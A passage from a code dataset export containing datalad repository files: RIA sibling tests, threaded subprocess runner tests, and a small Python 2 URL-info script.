\"ria+ssh://datalad-test{}\".format(store_path.as_posix())\n assert not detection_path.exists()\n\n with patch('datalad.support.sshconnector.SSHManager.get_connection',\n new=detector(SSHManager.get_connection, detection_path)):\n\n ds.create_sibling_ria(url, \"datastore\", push_url=push_url,\n new_store_ok=True)\n # used ssh_manager despite file-url hence used push-url (ria+ssh):\n assert detection_path.exists()\n\n # correct config in special remote:\n sr_cfg = ds.repo.get_special_remotes()[\n ds.siblings(name='datastore-storage')[0]['annex-uuid']]\n eq_(sr_cfg['url'], url)\n eq_(sr_cfg['push-url'], push_url)\n\n # git remote based on url (local path):\n eq_(ds.config.get(\"remote.datastore.url\"),\n (store_path / ds.id[:3] / ds.id[3:]).as_posix())\n eq_(ds.config.get(\"remote.datastore.pushurl\"),\n \"ssh://datalad-test{}\".format((store_path / ds.id[:3] / ds.id[3:]).as_posix()))\n\n # git-push uses SSH:\n detection_path.unlink()\n ds.push('.', to=\"datastore\", data='nothing')\n assert detection_path.exists()\n\n # data push\n # Note, that here the patching has no effect, since the special remote\n # is running in a subprocess of git-annex. Hence we can't detect SSH\n # usage really. However, ORA remote is tested elsewhere - if it succeeds\n # all should be good wrt `create-sibling-ria`.\n ds.repo.call_annex(['copy', '.', '--to', 'datastore-storage'])\n\n\n@skip_if_on_windows\n@skip_wo_symlink_capability\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_create_alias(ds_path=None, ria_path=None, clone_path=None):\n ds_path = Path(ds_path)\n clone_path = Path(clone_path)\n\n ds_path.mkdir()\n dsa = Dataset(ds_path / \"a\").create()\n\n res = dsa.create_sibling_ria(url=\"ria+file://{}\".format(ria_path),\n name=\"origin\",\n alias=\"ds-a\",\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n ds_clone = clone(source=\"ria+file://{}#~ds-a\".format(ria_path),\n path=clone_path / \"a\")\n assert_repo_status(ds_clone.path)\n\n # multiple datasets in a RIA store with different aliases work\n dsb = Dataset(ds_path / \"b\").create()\n\n res = dsb.create_sibling_ria(url=\"ria+file://{}\".format(ria_path),\n name=\"origin\",\n alias=\"ds-b\",\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n ds_clone = clone(source=\"ria+file://{}#~ds-b\".format(ria_path),\n path=clone_path / \"b\")\n assert_repo_status(ds_clone.path)\n\n # second dataset in a RIA store with the same alias emits a warning\n dsc = Dataset(ds_path / \"c\").create()\n\n with swallow_logs(logging.WARNING) as cml:\n res = dsc.create_sibling_ria(url=\"ria+file://{}\".format(ria_path),\n name=\"origin\",\n alias=\"ds-a\",\n new_store_ok=True)\n assert_in(\"Alias 'ds-a' already exists in the RIA store, not adding an alias\",\n cml.out)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n\n@skip_if_on_windows # ORA remote is incompatible with windows clients\n@with_tempfile\n@with_tree({'ds': {'file1.txt': 'some'}})\ndef test_storage_only(base_path=None, ds_path=None):\n store_url = 'ria+' + get_local_file_url(base_path)\n\n ds = Dataset(ds_path).create(force=True)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n\n res = ds.create_sibling_ria(store_url, \"datastore\", storage_sibling='only',\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n eq_(len(res), 1)\n\n # the storage sibling uses the main name, not -storage\n siblings = ds.siblings(result_renderer='disabled')\n eq_({'datastore', 'here'},\n {s['name'] for s in siblings})\n\n # smoke test that we can push to it\n res = ds.push(to='datastore')\n assert_status('ok', res)\n assert_result_count(res, 1, action='copy')\n\n\n@known_failure_githubci_win # reported in https://github.com/datalad/datalad/issues/5210\n@with_tempfile\n@with_tempfile\n@with_tree({'ds': {'file1.txt': 'some'}})\ndef test_no_storage(store1=None, store2=None, ds_path=None):\n store1_url = 'ria+' + get_local_file_url(store1)\n store2_url = 'ria+' + get_local_file_url(store2)\n\n ds = Dataset(ds_path).create(force=True)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n\n res = ds.create_sibling_ria(store1_url, \"datastore1\", storage_sibling=False,\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n eq_({'datastore1', 'here'},\n {s['name'] for s in ds.siblings(result_renderer='disabled')})\n\n # deprecated way of disabling storage still works\n res = ds.create_sibling_ria(store2_url, \"datastore2\",\n storage_sibling=False, new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n eq_({'datastore2', 'datastore1', 'here'},\n {s['name'] for s in ds.siblings(result_renderer='disabled')})\n\n # no annex/object dir should be created when there is no special remote\n # to use it.\n for s in [store1, store2]:\n p = Path(s) / ds.id[:3] / ds.id [3:] / 'annex' / 'objects'\n assert_false(p.exists())\n\n # smoke test that we can push to it\n res = ds.push(to='datastore1')\n assert_status('ok', res)\n # but nothing was copied, because there is no storage sibling\n assert_result_count(res, 0, action='copy')\n\n\n@with_tempfile\ndef test_no_store(path=None):\n ds = Dataset(path).create()\n # check that we fail without '--new-store-ok' when there is no store\n assert_result_count(\n ds.create_sibling_ria(\n \"'ria+file:///no/where'\", \"datastore\",\n on_failure='ignore'),\n 1,\n status=\"error\")\n\n# TODO: explicit naming of special remote\n" }, { "alpha_fraction": 0.6033862233161926, "alphanum_fraction": 0.6092343926429749, "avg_line_length": 31.00523567199707, "blob_id": "b4b77e3e7aacba298dbbdb3d672c4b3e435a0880", "content_id": "4cabc25c1f6f25c4a9ad2e4b359e190243d0853d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24452, "license_type": "permissive", "max_line_length": 129, "num_lines": 764, "path": "/datalad/runner/tests/test_nonasyncrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test the thread based runner (aka. non asyncio based runner).\n\"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nimport os\nimport queue\nimport signal\nimport subprocess\nimport sys\nimport time\nfrom collections.abc import (\n Generator,\n Iterator,\n)\nfrom itertools import count\nfrom queue import Queue\nfrom threading import Thread\nfrom time import sleep\nfrom typing import (\n Any,\n Optional,\n)\nfrom unittest.mock import (\n MagicMock,\n patch,\n)\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_raises,\n assert_true,\n eq_,\n known_failure_osx,\n known_failure_windows,\n with_tempfile,\n)\nfrom datalad.utils import on_windows\n\nfrom .. import (\n NoCapture,\n Protocol,\n Runner,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom ..nonasyncrunner import (\n IOState,\n ThreadedRunner,\n run_command,\n)\nfrom ..protocol import GeneratorMixIn\nfrom ..runnerthreads import (\n ReadThread,\n WriteThread,\n)\nfrom ..utils import LineSplitter\nfrom .utils import py2cmd\n\n\n# Protocol classes used for a set of generator tests later\nclass GenStdoutStderr(GeneratorMixIn, StdOutErrCapture):\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n StdOutErrCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n\n def timeout(self, fd: Optional[int]) -> bool:\n return True\n\n\nclass GenNothing(GeneratorMixIn, NoCapture):\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n NoCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n\n\nclass GenStdoutLines(GeneratorMixIn, StdOutCapture):\n \"\"\"A generator-based protocol yielding individual subprocess' stdout lines\n\n This is a simple implementation that is good enough for tests, i.e. with\n controlled inpute. It will fail if data is delivered in parts to\n self.pipe_data_received that are split inside an encoded character.\n \"\"\"\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n StdOutCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n self.line_splitter = LineSplitter()\n\n def timeout(self, fd: Optional[int]) -> bool:\n return True\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n for line in self.line_splitter.process(data.decode(self.encoding)):\n self.send_result(line)\n\n def pipe_connection_lost(self, fd: int, exc: Optional[BaseException]) -> None:\n remaining_line = self.line_splitter.finish_processing()\n if remaining_line is not None:\n self.send_result(remaining_line)\n\n\ndef test_subprocess_return_code_capture() -> None:\n\n class KillProtocol(Protocol):\n\n proc_out = True\n proc_err = True\n\n def __init__(self, signal_to_send: int, result_pool: dict) -> None:\n super().__init__()\n self.signal_to_send = signal_to_send\n self.result_pool = result_pool\n\n def connection_made(self, process: subprocess.Popen) -> None:\n super().connection_made(process)\n process.send_signal(self.signal_to_send)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.result_pool[\"connection_lost_called\"] = (True, exc)\n\n def process_exited(self) -> None:\n self.result_pool[\"process_exited_called\"] = True\n\n # windows doesn't support SIGINT but would need a Ctrl-C\n signal_to_send = signal.SIGTERM if on_windows else signal.SIGINT\n result_pool: dict[str, Any] = dict()\n result = run_command([\"waitfor\", \"/T\", \"10000\", \"TheComputerTurnsIntoATulip\"]\n if on_windows\n else [\"sleep\", \"10000\"],\n KillProtocol,\n None,\n {\n \"signal_to_send\": signal_to_send,\n \"result_pool\": result_pool\n },\n exception_on_error=False)\n assert isinstance(result, dict)\n if not on_windows:\n # this one specifically tests the SIGINT case, which is not supported\n # on windows\n eq_(result[\"code\"], -signal_to_send)\n assert_true(result_pool[\"connection_lost_called\"][0])\n assert_true(result_pool[\"process_exited_called\"])\n\n\ndef test_interactive_communication() -> None:\n\n class BidirectionalProtocol(Protocol):\n\n proc_out = True\n proc_err = True\n\n def __init__(self, result_pool: dict[str, bool]) -> None:\n super().__init__()\n self.state = 0\n self.result_pool = result_pool\n\n def connection_made(self, process: subprocess.Popen) -> None:\n super().connection_made(process)\n assert self.process is not None\n assert self.process.stdin is not None\n os.write(self.process.stdin.fileno(), b\"1 + 1\\n\")\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.result_pool[\"connection_lost_called\"] = True\n\n def process_exited(self) -> None:\n self.result_pool[\"process_exited_called\"] = True\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n super().pipe_data_received(fd, data)\n assert self.process is not None\n assert self.process.stdin is not None\n if self.state == 0:\n self.state += 1\n os.write(self.process.stdin.fileno(), b\"2 ** 3\\n\")\n if self.state == 1:\n self.state += 1\n os.write(self.process.stdin.fileno(), b\"exit(0)\\n\")\n\n result_pool: dict[str, bool] = dict()\n result = run_command([sys.executable, \"-i\"],\n BidirectionalProtocol,\n stdin=subprocess.PIPE,\n protocol_kwargs={\n \"result_pool\": result_pool\n })\n\n assert isinstance(result, dict)\n lines = [line.strip() for line in result[\"stdout\"].splitlines()]\n eq_(lines, [\"2\", \"8\"])\n assert_true(result_pool[\"connection_lost_called\"], True)\n assert_true(result_pool[\"process_exited_called\"], True)\n\n\ndef test_blocking_thread_exit() -> None:\n read_queue: Queue[tuple[Any, IOState, bytes]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n read_file = os.fdopen(read_descriptor, \"rb\")\n read_thread = ReadThread(\n identifier=\"test thread\",\n user_info=read_descriptor,\n source=read_file,\n destination_queue=read_queue,\n signal_queues=[]\n )\n read_thread.start()\n\n os.write(write_descriptor, b\"some data\")\n assert_true(read_thread.is_alive())\n identifier, state, data = read_queue.get()\n eq_(data, b\"some data\")\n\n read_thread.request_exit()\n\n # Check the blocking part\n sleep(.3)\n assert_true(read_thread.is_alive())\n\n # Check actual exit, we will not get\n # \"more data\" when exit was requested,\n # because the thread will not attempt\n # a write\n os.write(write_descriptor, b\"more data\")\n read_thread.join()\n print(read_queue.queue)\n assert_true(read_queue.empty())\n\n\ndef test_blocking_read_exception_catching() -> None:\n read_queue: Queue[tuple[Any, IOState, Any]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n read_file = os.fdopen(read_descriptor, \"rb\")\n read_thread = ReadThread(\n identifier=\"test thread\",\n user_info=read_descriptor,\n source=read_file,\n destination_queue=read_queue,\n signal_queues=[read_queue]\n )\n read_thread.start()\n\n os.write(write_descriptor, b\"some data\")\n assert_true(read_thread.is_alive())\n identifier, state, data = read_queue.get()\n eq_(data, b\"some data\")\n os.close(write_descriptor)\n read_thread.join()\n identifier, state, data = read_queue.get()\n eq_(data, None)\n\n\ndef test_blocking_read_closing() -> None:\n # Expect that a reader thread exits when os.read throws an error.\n fake_file = MagicMock(**{\"fileno.return_value\": -1, \"close.return_value\": None})\n\n def fake_read(*args: Any) -> None:\n raise ValueError(\"test exception\")\n\n read_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue()\n destination_queue: Queue[tuple[Any, IOState, bytes]] = queue.Queue()\n with patch(\"datalad.runner.runnerthreads.os.read\") as read:\n read.side_effect = fake_read\n\n read_thread = ReadThread(\n identifier=\"test thread\",\n user_info=None,\n source=fake_file,\n destination_queue=destination_queue,\n signal_queues=[read_queue])\n\n read_thread.start()\n read_thread.join()\n\n identifier, state, data = read_queue.get()\n eq_(data, None)\n\n\ndef test_blocking_write_exception_catching() -> None:\n # Expect that a blocking writer catches exceptions and exits gracefully.\n\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n os.close(read_descriptor)\n os.close(write_descriptor)\n\n write_queue.put(b\"more data\")\n write_thread.join()\n eq_(signal_queue.get(), (write_descriptor, IOState.ok, None))\n\n\ndef test_blocking_writer_closing() -> None:\n # Expect that a blocking writer closes its file when `None` is sent to it.\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n write_queue.put(None)\n write_thread.join()\n eq_(signal_queue.get(), (write_descriptor, IOState.ok, None))\n\n\ndef test_blocking_writer_closing_timeout_signal() -> None:\n # Expect that writer or reader do not block forever on a full signal queue\n\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue(1)\n signal_queue.put((\"This is data\", IOState.ok, None))\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n write_queue.put(None)\n write_thread.join()\n eq_(signal_queue.get(), (\"This is data\", IOState.ok, None))\n\n\ndef test_blocking_writer_closing_no_signal() -> None:\n # Expect that writer or reader do not block forever on a full signal queue\n\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue(1)\n signal_queue.put((\"This is data\", IOState.ok, None))\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n write_queue.put(None)\n write_thread.join()\n\n\ndef test_inside_async() -> None:\n async def main() -> dict:\n runner = Runner()\n res = runner.run(\n ([\"cmd.exe\", \"/c\"] if on_windows else []) + [\"echo\", \"abc\"],\n StdOutCapture)\n assert isinstance(res, dict)\n return res\n\n result = asyncio.run(main())\n eq_(result[\"stdout\"], \"abc\" + os.linesep)\n\n\n# Both Windows and OSX suffer from wrapt's object proxy insufficiency\n# NotImplementedError: object proxy must define __reduce_ex__()\n@known_failure_osx\n@known_failure_windows\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_popen_invocation(src_path: str = \"\", dest_path: str = \"\") -> None:\n # https://github.com/ReproNim/testkraken/issues/93\n from multiprocessing import Process\n\n from datalad.api import clone # type: ignore[attr-defined]\n from datalad.distribution.dataset import Dataset\n\n src = Dataset(src_path).create()\n (src.pathobj / \"file.dat\").write_bytes(b\"\\000\")\n src.save(message=\"got data\")\n\n dest = clone(source=src_path, path=dest_path)\n fetching_data = Process(target=dest.get, kwargs={\"path\": 'file.dat'})\n fetching_data.start()\n fetching_data.join(5.0)\n assert_false(fetching_data.is_alive(), \"Child is stuck!\")\n\n\ndef test_timeout() -> None:\n # Expect timeout protocol calls on long running process\n # if the specified timeout is short enough\n class TestProtocol(StdOutErrCapture):\n\n received_timeouts: list[tuple[int, Optional[int]]] = []\n\n def __init__(self) -> None:\n StdOutErrCapture.__init__(self)\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n TestProtocol.received_timeouts.append((next(self.counter), fd))\n return False\n\n run_command(\n [\"waitfor\", \"/T\", \"1\", \"TheComputerTurnsIntoATulip\"]\n if on_windows\n else [\"sleep\", \"1\"],\n stdin=None,\n protocol=TestProtocol,\n timeout=.1\n )\n assert_true(len(TestProtocol.received_timeouts) > 0)\n assert_true(all(map(lambda e: e[1] in (1, 2, None), TestProtocol.received_timeouts)))\n\n\ndef test_timeout_nothing() -> None:\n # Expect timeout protocol calls for the process on long running processes,\n # if the specified timeout is short enough.\n class TestProtocol(NoCapture):\n def __init__(self,\n timeout_queue: list[Optional[int]]) -> None:\n NoCapture.__init__(self)\n self.timeout_queue = timeout_queue\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n self.timeout_queue.append(fd)\n return False\n\n stdin_queue: Queue[Optional[bytes]] = queue.Queue()\n for i in range(12):\n stdin_queue.put(b\"\\x00\" * 1024)\n stdin_queue.put(None)\n\n timeout_queue: list[Optional[int]] = []\n run_command(\n py2cmd(\"import time; time.sleep(.4)\\n\"),\n stdin=stdin_queue,\n protocol=TestProtocol,\n timeout=.1,\n protocol_kwargs=dict(timeout_queue=timeout_queue)\n )\n # Ensure that we have only process timeouts and at least one\n assert_true(all(map(lambda e: e is None, timeout_queue)))\n assert_true(len(timeout_queue) > 0)\n\n\ndef test_timeout_stdout_stderr() -> None:\n # Expect timeouts on stdin, stdout, stderr, and the process\n class TestProtocol(StdOutErrCapture):\n def __init__(self,\n timeout_queue: list[tuple[int, Optional[int]]]) -> None:\n StdOutErrCapture.__init__(self)\n self.timeout_queue = timeout_queue\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n self.timeout_queue.append((next(self.counter), fd))\n return False\n\n stdin_queue: Queue[Optional[bytes]] = queue.Queue()\n for i in range(12):\n stdin_queue.put(b\"\\x00\" * 1024)\n stdin_queue.put(None)\n\n timeout_queue: list[tuple[int, Optional[int]]] = []\n run_command(\n py2cmd(\"import time;time.sleep(.5)\\n\"),\n stdin=stdin_queue,\n protocol=TestProtocol,\n timeout=.1,\n protocol_kwargs=dict(timeout_queue=timeout_queue)\n )\n\n # Expect at least one timeout for stdout and stderr.\n # there might be more.\n sources = (1, 2)\n assert_true(len(timeout_queue) >= len(sources))\n for source in sources:\n assert_true(any(fd == source for _, fd in timeout_queue))\n\n\ndef test_timeout_process() -> None:\n # Expect timeouts on stdin, stdout, stderr, and the process\n class TestProtocol(StdOutErrCapture):\n def __init__(self,\n timeout_queue: list[tuple[int, Optional[int]]]) -> None:\n StdOutErrCapture.__init__(self)\n self.timeout_queue = timeout_queue\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n self.timeout_queue.append((next(self.counter), fd))\n return False\n\n stdin_queue: Queue[Optional[bytes]] = queue.Queue()\n for i in range(12):\n stdin_queue.put(b\"\\x00\" * 1024)\n stdin_queue.put(None)\n\n timeout_queue: list[tuple[int, Optional[int]]] = []\n run_command(\n py2cmd(\"import time;time.sleep(.5)\\n\"),\n stdin=stdin_queue,\n protocol=TestProtocol,\n timeout=.1,\n protocol_kwargs=dict(timeout_queue=timeout_queue)\n )\n\n # Expect at least one timeout for stdout and stderr.\n # there might be more.\n sources = (1, 2)\n assert_true(len(timeout_queue) >= len(sources))\n for source in sources:\n assert_true(any(fd == source for _, fd in timeout_queue))\n\n\ndef test_exit_3() -> None:\n # Expect the process to be closed after\n # the generator exits.\n rt = ThreadedRunner(cmd=[\"sleep\", \"4\"],\n stdin=None,\n protocol_class=GenStdoutStderr,\n timeout=.5,\n exception_on_error=False)\n tuple(rt.run())\n assert_true(rt.return_code is not None)\n\n\ndef test_exit_4() -> None:\n rt = ThreadedRunner(cmd=[\"sleep\", \"4\"],\n stdin=None,\n protocol_class=GenNothing,\n timeout=.5)\n tuple(rt.run())\n assert_true(rt.return_code is not None)\n\n\ndef test_generator_throw() -> None:\n rt = ThreadedRunner(cmd=[\"sleep\", \"4\"],\n stdin=None,\n protocol_class=GenNothing,\n timeout=.5)\n gen = rt.run()\n assert isinstance(gen, Generator)\n assert_raises(ValueError, gen.throw, ValueError, ValueError(\"abcdefg\"))\n\n\ndef test_exiting_process() -> None:\n result = run_command(py2cmd(\"import time\\ntime.sleep(3)\\nprint('exit')\"),\n protocol=NoCapture,\n stdin=None)\n assert isinstance(result, dict)\n eq_(result[\"code\"], 0)\n\n\ndef test_stalling_detection_1() -> None:\n runner = ThreadedRunner(\"something\", StdOutErrCapture, None)\n runner.stdout_enqueueing_thread = None\n runner.stderr_enqueueing_thread = None\n runner.process_waiting_thread = None\n with patch(\"datalad.runner.nonasyncrunner.lgr\") as logger:\n runner.process_queue()\n eq_(logger.method_calls[0][0], \"warning\")\n eq_(logger.method_calls[0][1][0], \"ThreadedRunner.process_queue(): stall detected\")\n\n\ndef test_stalling_detection_2() -> None:\n thread_mock = MagicMock()\n thread_mock.is_alive.return_value = False\n runner = ThreadedRunner(\"something\", StdOutErrCapture, None)\n runner.stdout_enqueueing_thread = thread_mock\n runner.stderr_enqueueing_thread = thread_mock\n runner.process_waiting_thread = thread_mock\n with patch(\"datalad.runner.nonasyncrunner.lgr\") as logger:\n runner.process_queue()\n eq_(logger.method_calls[0][0], \"warning\")\n eq_(logger.method_calls[0][1][0], \"ThreadedRunner.process_queue(): stall detected\")\n\n\ndef test_concurrent_waiting_run() -> None:\n from threading import Thread\n\n threaded_runner = ThreadedRunner(\n py2cmd(\"import time; time.sleep(1)\"),\n protocol_class=NoCapture,\n stdin=None,\n )\n\n start = time.time()\n\n number_of_threads = 5\n caller_threads = []\n for c in range(number_of_threads):\n caller_thread = Thread(target=threaded_runner.run)\n caller_thread.start()\n caller_threads.append(caller_thread)\n\n while caller_threads:\n t = caller_threads.pop()\n t.join()\n\n # If the threads are serialized, the duration should at least\n # be one second per thread.\n duration = time.time() - start\n assert duration >= 1.0 * number_of_threads\n\n\ndef test_concurrent_generator_reading() -> None:\n number_of_lines = 40\n number_of_threads = 100\n output_queue: Queue[tuple[int, Optional[str]]] = Queue()\n\n threaded_runner = ThreadedRunner(\n py2cmd(f\"for i in range({number_of_lines}): print(f'result#{{i}}')\"),\n protocol_class=GenStdoutLines,\n stdin=None,\n )\n result_generator = threaded_runner.run()\n\n def thread_main(thread_number: int, result_generator: Iterator[str], output_queue: Queue[tuple[int, Optional[str]]]) -> None:\n while True:\n try:\n output = next(result_generator)\n except StopIteration:\n output_queue.put((thread_number, None))\n break\n output_queue.put((thread_number, output))\n\n caller_threads = []\n for c in range(number_of_threads):\n caller_thread = Thread(\n target=thread_main,\n args=(c, result_generator, output_queue)\n )\n caller_thread.start()\n caller_threads.append(caller_thread)\n\n while caller_threads:\n t = caller_threads.pop()\n t.join()\n\n collected_outputs = [\n output_tuple[1]\n for output_tuple in output_queue.queue\n if output_tuple[1] is not None\n ]\n assert len(collected_outputs) == number_of_lines\n assert collected_outputs == [\n f\"result#{i}\"\n for i in range(number_of_lines)\n ]\n\n\ndef test_same_thread_reenter_detection() -> None:\n threaded_runner = ThreadedRunner(\n py2cmd(f\"print('hello')\"),\n protocol_class=GenStdoutLines,\n stdin=None,\n )\n threaded_runner.run()\n with pytest.raises(RuntimeError) as error:\n threaded_runner.run()\n assert \"re-entered by already\" in str(error.value)\n\n\ndef test_reenter_generator_detection() -> None:\n threaded_runner = ThreadedRunner(\n py2cmd(f\"print('hello')\"),\n protocol_class=GenStdoutLines,\n stdin=None,\n )\n\n def target(threaded_runner: ThreadedRunner, output_queue: Queue[tuple[str, float | BaseException]]) -> None:\n try:\n start_time = time.time()\n tuple(threaded_runner.run())\n output_queue.put((\"result\", time.time() - start_time))\n except RuntimeError as exc:\n output_queue.put((\"exception\", exc))\n\n output_queue: Queue[tuple[str, float | BaseException]] = Queue()\n\n for sleep_time in range(1, 4):\n other_thread = Thread(\n target=target,\n args=(threaded_runner, output_queue)\n )\n\n gen = threaded_runner.run()\n other_thread.start()\n time.sleep(sleep_time)\n tuple(gen)\n other_thread.join()\n\n assert len(list(output_queue.queue)) == 1\n result_type, value = output_queue.get()\n assert result_type == \"result\"\n assert isinstance(value, float)\n assert value >= sleep_time\n" }, { "alpha_fraction": 0.61948162317276, "alphanum_fraction": 0.630304753780365, "avg_line_length": 38, "blob_id": "e3095c07fc34b2abf44ef473d4b482fc4d3c5cfd", "content_id": "97ad01ea64a0a66e7eb2ad4125763713e2d59546", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3511, "license_type": "permissive", "max_line_length": 111, "num_lines": 90, "path": "/tools/urlinfo", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n#------------------------- =+- Python script -+= -------------------------\n\"\"\"\n Yaroslav Halchenko Dartmouth\n web: http://www.onerussian.com College\n e-mail: [email protected] ICQ#: 60653192\n\n DESCRIPTION (NOTES):\n\n COPYRIGHT: Yaroslav Halchenko 2013\n\n LICENSE: MIT\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n THE SOFTWARE.\n\"\"\"\n#-----------------\\____________________________________/------------------\n\n__author__ = 'Yaroslav Halchenko'\n__copyright__ = 'Copyright (c) 2013 Yaroslav Halchenko'\n__license__ = 'MIT'\n\nimport argparse\nimport re, os, sys, urllib2\n\nfrom urlparse import urlsplit\n\ndef main(cmdline=None):\n args = make_parser().parse_args(cmdline)\n\n for url in args.urls:\n if args.print_filename:\n print(get_filename(url))\n else:\n response = get_url(url)\n # by default just dump all the information\n print(\"URL: \", url)\n if url != response.url:\n print(\"REDIRECTED URL: \", response.url)\n print(response.info())\n\ndef make_parser():\n parser = argparse.ArgumentParser('%prog: little tool to help gather information about URL(s)')\n parser.add_argument('urls', nargs='*', help='URLs')\n parser.add_argument('-f', '--print-filename', action='store_true',\n help='just print a content-disposition filename if present.'\n ' Otherwise the trailing portion of the URL')\n return parser\n\ndef get_filename(url):\n response = get_url(url)\n info = response.info()\n if info.has_key('Content-Disposition'):\n res = re.match('.* filename=\"(.*)\"', info['Content-Disposition'])\n return res.groups()[0]\n else:\n return os.path.basename(urllib2.unquote(urlsplit(response.url).path))\n\ndef test_get_filename():\n assert(get_filename('http://human.brain-map.org/api/v2/well_known_file_download/157722290') == 'T1.nii.gz')\n assert(get_filename('https://raw.githubusercontent.com/datalad/datalad/master/README.md') == 'README.md')\n\n\ndef get_url(url):\n request = urllib2.Request(url)\n request.add_header('Accept-encoding', 'gzip,deflate')\n response = urllib2.urlopen(request)\n return response\n\nif __name__ == '__main__':\n # for some reason nose refused to load tests even with --exe\n # test_get_filename()\n sys.exit(main())\n\n" }, { "alpha_fraction": 0.5988112688064575, 